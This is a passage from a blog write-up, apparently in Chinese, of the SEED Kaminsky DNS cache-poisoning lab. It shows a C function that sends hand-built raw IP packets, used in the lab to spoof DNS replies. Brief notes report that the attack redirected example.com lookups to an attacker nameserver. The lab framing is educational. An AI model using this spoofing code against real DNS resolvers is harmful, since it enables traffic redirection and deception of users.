packet, with everything filled out.</span></span><br><span class="line"><span class="comment"> *    pkt_size: the size of the buffer.</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">send_raw_packet</span><span class="params">(<span class="type">char</span> *buffer, <span class="type">int</span> pkt_size)</span> &#123;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">dest_info</span>;</span></span><br><span class="line">  <span class="type">int</span> enable = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step 1: Create a raw network socket.</span></span><br><span class="line">  <span class="type">int</span> sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step 2: Set socket option.</span></span><br><span class="line">  setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &amp;enable, <span class="keyword">sizeof</span>(enable));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step 3: Provide needed information about destination.</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">ipheader</span> *<span class="title">ip</span> =</span> (<span class="keyword">struct</span> ipheader *)buffer;</span><br><span class="line">  dest_info.sin_family = AF_INET;</span><br><span class="line">  dest_info.sin_addr = ip-&gt;iph_destip;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step 4: Send the packet out.</span></span><br><span class="line">  sendto(sock, buffer, pkt_size, <span class="number">0</span>, (<span class="keyword">struct</span> sockaddr *)&amp;dest_info,</span><br><span class="line">         <span class="keyword">sizeof</span>(dest_info));</span><br><span class="line">  close(sock);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>执行过程中查看结果如下，执行一段时间后，攻击成功。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240318003245124.png" alt="image-20240318003245124"></p>
<h3 id="Task-5-Result-Verification"><a href="#Task-5-Result-Verification" class="headerlink" title="Task 5: Result Verification"></a>Task 5: Result Verification</h3><p>结果验证，后续我们查询 <a target="_blank" rel="noopener" href="http://www.example.com,将会向/">www.example.com，将会向</a> ns.attacker32.com 询问。在 User 处验证如下，攻击成功，达到了目的。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240318004235602.png" alt="image-20240318004235602"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Lab-Overview"><span class="toc-number">1.</span> <span class="toc-text">Lab Overview</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Lab-Environment-Setup-Task-1"><span class="toc-number">2.</span> <span class="toc-text">Lab Environment Setup (Task 1)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#The-Attack-Tasks"><span class="toc-number">3.</span> <span class="toc-text">The Attack Tasks</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-Kaminsky-attack-works"><span class="toc-number">4.</span> <span class="toc-text">How Kaminsky attack works</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-2-Construct-DNS-request"><span class="toc-number">5.</span> <span class="toc-text">Task 2: Construct DNS request</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-3-Spoof-DNS-Replies"><span class="toc-number">6.</span> <span class="toc-text">Task 3: Spoof DNS Replies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-4-Launch-the-Kaminsky-Attack"><span class="toc-number">7.</span> <span class="toc-text">Task 4: Launch the Kaminsky Attack</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Task-5-Result-Verification"><span class="toc-number">7.1.</span> <span class="toc-text">Task 5: Result Verification</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ceyewan.github.io/p/cc08d9b4.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ceyewan.github.io/p/cc08d9b4.html&text=The-Kaminsky-Attack-Lab"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ceyewan.github.io/p/cc08d9b4.html&is_video=false&description=The-Kaminsky-Attack-Lab"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=The-Kaminsky-Attack-Lab&body=Check out this article: https://ceyewan.github.io/p/cc08d9b4.html"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ceyewan.github.io/p/cc08d9b4.html&name=The-Kaminsky-Attack-Lab&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ceyewan.github.io/p/cc08d9b4.html&t=The-Kaminsky-Attack-Lab"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
      
        
          2016-2024
  </div>
  <div class="footer-left">
    ceyewan
  </div>
</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
